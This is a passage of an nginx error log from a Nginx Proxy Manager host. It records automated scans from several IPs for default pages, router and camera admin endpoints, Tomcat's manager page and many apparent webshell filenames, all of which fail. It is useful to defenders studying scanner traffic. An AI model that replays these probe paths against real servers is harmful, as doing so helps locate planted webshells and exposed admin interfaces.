"/var/www/html/menu.pl" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /menu.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:56 [error] 344#344: *59760 open() "/var/www/html/indice.php" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /indice.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:56 [error] 344#344: *59761 open() "/var/www/html/base.php" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /base.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:56 [error] 344#344: *59762 open() "/var/www/html/admin.jsp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /admin.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:57 [error] 344#344: *59763 open() "/var/www/html/base.jhtml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /base.jhtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:57 [error] 344#344: *59764 open() "/var/www/html/localstart.aspx" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /localstart.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:57 [error] 347#347: *59765 open() "/var/www/html/base.inc" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /base.inc HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:57 [error] 347#347: *59766 open() "/var/www/html/default.pl" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /default.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:57 [error] 347#347: *59767 open() "/var/www/html/admin.cfm" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /admin.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:57 [error] 347#347: *59768 open() "/var/www/html/menu.cfm" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /menu.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:58 [error] 347#347: *59769 open() "/var/www/html/main.cgi" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /main.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:58 [error] 347#347: *59770 open() "/var/www/html/inicio.shtml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /inicio.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:58 [error] 347#347: *59771 open() "/var/www/html/default.shtml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /default.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:58 [error] 347#347: *59772 open() "/var/www/html/base.cgi" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /base.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:58 [error] 346#346: *59773 open() "/var/www/html/menu.cgi" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /menu.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:58 [error] 346#346: *59774 open() "/var/www/html/home.cgi" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /home.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:59 [error] 346#346: *59776 open() "/var/www/html/default.jsa" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /default.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:59 [error] 346#346: *59777 open() "/var/www/html/start.pl" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /start.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:59 [error] 346#346: *59778 open() "/var/www/html/localstart.php" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /localstart.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:59 [error] 346#346: *59779 open() "/var/www/html/index.cgi" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /index.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:59 [error] 346#346: *59780 open() "/var/www/html/main.shtml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /main.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:59 [error] 346#346: *59781 open() "/var/www/html/inicio.jsa" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /inicio.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:19:59 [error] 346#346: *59782 open() "/var/www/html/menu.jsp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /menu.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:00 [error] 346#346: *59783 open() "/var/www/html/indice.pl" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /indice.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:00 [error] 346#346: *59784 open() "/var/www/html/base.pl" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /base.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:00 [error] 346#346: *59785 open() "/var/www/html/readme.txt" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /readme.txt HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:00 [error] 346#346: *59786 open() "/var/www/html/inicio.aspx" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /inicio.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:00 [error] 346#346: *59787 open() "/var/www/html/indice.jsa" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /indice.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:00 [error] 346#346: *59788 open() "/var/www/html/base.cfm" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /base.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:01 [error] 345#345: *59789 open() "/var/www/html/indice.asp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /indice.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:01 [error] 345#345: *59790 open() "/var/www/html/indice.aspx" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /indice.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:01 [error] 345#345: *59791 open() "/var/www/html/indice.cgi" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /indice.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:01 [error] 345#345: *59792 open() "/var/www/html/inicio.pl" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /inicio.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:01 [error] 345#345: *59793 open() "/var/www/html/default.asp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /default.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:01 [error] 345#345: *59794 open() "/var/www/html/localstart.html" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /localstart.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:01 [error] 345#345: *59795 open() "/var/www/html/inicio.jsp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /inicio.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:02 [error] 345#345: *59796 open() "/var/www/html/indice.shtml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /indice.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:02 [error] 345#345: *59797 open() "/var/www/html/index.jsa" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /index.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:02 [error] 345#345: *59798 open() "/var/www/html/inicio.jhtml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /inicio.jhtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:02 [error] 345#345: *59799 open() "/var/www/html/indice.html" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /indice.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:02 [error] 345#345: *59800 open() "/var/www/html/localstart.asp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /localstart.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:02 [error] 345#345: *59801 open() "/var/www/html/inicio.cgi" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /inicio.cgi HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:03 [error] 345#345: *59802 open() "/var/www/html/inicio.cfm" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /inicio.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:03 [error] 345#345: *59803 open() "/var/www/html/indice.jhtml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /indice.jhtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:03 [error] 345#345: *59804 open() "/var/www/html/base.asp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /base.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:03 [error] 344#344: *59805 open() "/var/www/html/localstart.shtml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /localstart.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:03 [error] 344#344: *59806 open() "/var/www/html/localstart.jsp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /localstart.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:04 [error] 344#344: *59807 open() "/var/www/html/main.asp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /main.asp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:04 [error] 344#344: *59808 open() "/var/www/html/indice.jsp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /indice.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:04 [error] 344#344: *59809 open() "/var/www/html/menu.jsa" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /menu.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:04 [error] 344#344: *59810 open() "/var/www/html/default.aspx" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /default.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:04 [error] 344#344: *59811 open() "/var/www/html/start.shtml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /start.shtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:04 [error] 344#344: *59812 open() "/var/www/html/start.html" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /start.html HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:05 [error] 344#344: *59813 open() "/var/www/html/base.aspx" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /base.aspx HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:05 [error] 344#344: *59814 open() "/var/www/html/home.jsa" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /home.jsa HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:05 [error] 344#344: *59815 open() "/var/www/html/home.cfm" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /home.cfm HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:05 [error] 344#344: *59816 open() "/var/www/html/main.pl" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /main.pl HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:05 [error] 344#344: *59817 open() "/var/www/html/main.jhtml" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /main.jhtml HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:05 [error] 344#344: *59818 open() "/var/www/html/default.jsp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /default.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:20:05 [error] 344#344: *59819 open() "/var/www/html/start.jsp" failed (2: No such file or directory), client: 139.162.173.209, server: localhost-nginx-proxy-manager, request: "GET /start.jsp HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 01:31:27 [error] 347#347: *59844 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 02:16:35 [error] 347#347: *59868 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 03:02:55 [error] 347#347: *59896 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 03:20:50 [error] 346#346: *59901 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 130.12.180.18, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 03:47:58 [error] 346#346: *59917 open() "/var/www/html/form.html" failed (2: No such file or directory), client: 152.42.181.47, server: localhost-nginx-proxy-manager, request: "GET /form.html HTTP/1.1", host: "91.82.83.208" +2026/01/24 03:47:58 [error] 346#346: *59918 open() "/var/www/html/upl.php" failed (2: No such file or directory), client: 152.42.181.47, server: localhost-nginx-proxy-manager, request: "GET /upl.php HTTP/1.1", host: "91.82.83.208" +2026/01/24 03:47:59 [error] 346#346: *59919 open() "/var/www/html/t4" failed (2: No such file or directory), client: 152.42.181.47, server: localhost-nginx-proxy-manager, request: "GET /t4 HTTP/1.1", host: "91.82.83.208" +2026/01/24 03:48:00 [error] 345#345: *59920 "/var/www/html/geoip/index.html" is not found (2: No such file or directory), client: 152.42.181.47, server: localhost-nginx-proxy-manager, request: "GET /geoip/ HTTP/1.1", host: "91.82.83.208" +2026/01/24 03:48:02 [error] 347#347: *61408 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 152.42.181.47, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "91.82.83.208" +2026/01/24 03:48:03 [error] 347#347: *61409 open() "/var/www/html/systembc/password.php" failed (2: No such file or directory), client: 152.42.181.47, server: localhost-nginx-proxy-manager, request: "GET /systembc/password.php HTTP/1.1", host: "91.82.83.208" +2026/01/24 03:48:03 [error] 347#347: *61410 open() "/var/www/html/password.php" failed (2: No such file or directory), client: 152.42.181.47, server: localhost-nginx-proxy-manager, request: "GET /password.php HTTP/1.1", host: "91.82.83.208" +2026/01/24 03:48:40 [error] 347#347: *61411 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 03:50:50 [error] 347#347: *61412 open() "/var/www/html/manager/html" failed (2: No such file or directory), client: 20.65.138.86, server: localhost-nginx-proxy-manager, request: "GET /manager/html HTTP/1.1", host: "91.82.83.208" +2026/01/24 04:20:52 [error] 354#354: *61450 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 64.62.156.222, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "91.82.83.208" +2026/01/24 04:23:03 [error] 352#352: *62938 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 64.62.156.222, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "91.82.83.208" +2026/01/24 04:34:43 [error] 353#353: *62967 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/24 05:19:33 [error] 354#354: *62977 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:33 [error] 354#354: *62977 open() "/var/www/html/n3.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /n3.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:33 [error] 354#354: *62977 open() "/var/www/html/gwmy.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /gwmy.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:33 [error] 354#354: *62977 open() "/var/www/html/n3.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //n3.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:33 [error] 354#354: *62977 open() "/var/www/html/gwmy.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //gwmy.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:33 [error] 354#354: *62977 open() "/var/www/html/ccs.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /ccs.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:33 [error] 354#354: *62977 open() "/var/www/html/about8.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /about8.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:33 [error] 354#354: *62977 open() "/var/www/html/fortest.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /fortest.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:33 [error] 354#354: *62977 open() "/var/www/html/ccs.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //ccs.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:33 [error] 354#354: *62977 open() "/var/www/html/about8.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //about8.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:34 [error] 354#354: *62977 open() "/var/www/html/fortest.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //fortest.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:34 [error] 354#354: *62977 open() "/var/www/html/xvde.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /xvde.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:34 [error] 354#354: *62977 open() "/var/www/html/itil.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /itil.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:34 [error] 354#354: *62977 open() "/var/www/html/f355.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /f355.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:34 [error] 354#354: *62977 open() "/var/www/html/bgymj.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /bgymj.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:34 [error] 354#354: *62977 open() "/var/www/html/nf.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /nf.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:34 [error] 354#354: *62977 open() "/var/www/html/lala.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //lala.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:34 [error] 354#354: *62977 open() "/var/www/html/3r.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /3r.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:34 [error] 354#354: *62977 open() "/var/www/html/8xyz.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /8xyz.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:34 [error] 354#354: *62977 open() "/var/www/html/la.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /la.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:34 [error] 354#354: *62977 open() "/var/www/html/ioxi.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /ioxi.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:34 [error] 354#354: *62977 open() "/var/www/html/xpwer1.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /xpwer1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:34 [error] 354#354: *62977 open() "/var/www/html/about.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:34 [error] 354#354: *62977 open() "/var/www/html/wp-admin/images/commentv.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/images/commentv.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:34 [error] 354#354: *62977 open() "/var/www/html/la.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //la.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:34 [error] 354#354: *62977 open() "/var/www/html/cgi-bin/index.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //cgi-bin/index.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:34 [error] 354#354: *62977 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //admin.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:34 [error] 354#354: *62977 open() "/var/www/html/wp-includes/fonts/index.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/fonts/index.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:35 [error] 354#354: *62977 open() "/var/www/html/wp-admin/images/wp-conflg.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //wp-admin/images/wp-conflg.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:35 [error] 354#354: *62977 open() "/var/www/html/info.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /info.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:35 [error] 354#354: *62977 open() "/var/www/html/about.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /about.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:35 [error] 354#354: *62977 "/var/www/html/x/index.html" is not found (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /x/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:35 [error] 354#354: *62977 open() "/var/www/html/ss1.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /ss1.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:35 [error] 354#354: *62977 open() "/var/www/html/assets/css/index.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //assets/css/index.php?p= HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:35 [error] 354#354: *62977 open() "/var/www/html/goods.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //goods.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:35 [error] 354#354: *62977 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //admin.php?fm=true HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:35 [error] 354#354: *62977 open() "/var/www/html/222.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /222.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:35 [error] 354#354: *62977 open() "/var/www/html/abcd.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /abcd.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:35 [error] 354#354: *62977 "/var/www/html/wp-includes/blocks/code/index.html" is not found (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/blocks/code/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:35 [error] 354#354: *62977 open() "/var/www/html/adminfuns.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET //adminfuns.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:35 [error] 354#354: *62977 open() "/var/www/html/ioxi-o.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:35 [error] 354#354: *62977 "/var/www/html/wp-content/index.html" is not found (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-content/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:35 [error] 354#354: *62977 open() "/var/www/html/goat.php" failed (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /goat.php HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:35 [error] 354#354: *62977 "/var/www/html/wp-includes/PHPMailer/index.html" is not found (2: No such file or directory), client: 40.113.19.56, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/PHPMailer/ HTTP/1.1", host: "91-82-83-208.pool.digikabel.hu" +2026/01/24 05:19:35 [error] 354#354: *62977 open() "/var/www/html/xx.php" failed (2: No such file or directory), client: 40.113.19.56, server: 